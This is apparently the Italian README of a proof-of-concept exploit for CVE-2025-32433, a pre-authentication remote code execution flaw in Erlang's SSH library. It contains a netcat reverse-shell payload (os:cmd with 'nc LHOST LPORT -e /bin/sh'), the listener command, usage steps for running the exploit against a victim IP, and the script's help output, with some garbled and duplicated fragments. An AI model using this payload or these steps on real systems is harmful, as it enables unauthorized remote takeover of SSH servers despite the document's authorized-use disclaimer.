
Un exploit proof-of-concept per CVE-2025-32433, una vulnerabilità critica nella libreria SSH di Erlang che consente l'esecuzione di codice pre-autenticato tramite pacchetti SSH_MSG_CHANNEL_REQUEST malformati.
Un proof-of-concept per CVE-2025-32433, una vulnerabilità critica nella libreria SSH di Erlang che consente l'esecuzione di codice prima dell'autenticazione tramite pacchetti SSH_MSG_CHANNEL_REQUEST malformati.
argparseos:cmd("nc LHOST LPORT -e /bin/sh").nc (Netcat) funzionante sulla macchina attaccante22)Avvia il listener sulla macchina attaccante:
nc -lvnp 4444
Esegui l'exploit:
python3 CVE-2025-32433.py -lh [IP-Attaccante] -lp [Porta-Attaccante] -rh [IP-Vittima] -rp [Porta-Vittima]
Attendi la shell che si connetta al tuo listener.
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]
Invia una richiesta di canale SSH pre-autenticazione con un payload RCE di Erlang
per ottenere una reverse shell
optional arguments:
-h, --help mostra questo messaggio di aiuto ed esci
-lh LHOST, --lhost LHOST
Host/IP locale per ricevere la reverse shell
-lp LPORT, --lport LPORT
Porta locale per ricevere la reverse shell
-rh RHOST, --rhost RHOST
IP del server SSH di destinazione (default: 10.10.248.101)
-rp RPORT, --rport RPORT
Porta del server SSH di destinazione (default: 22)
Usa questo codice solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. Lo sfruttamento non autorizzato delle vulnerabilità è illegale e non etico.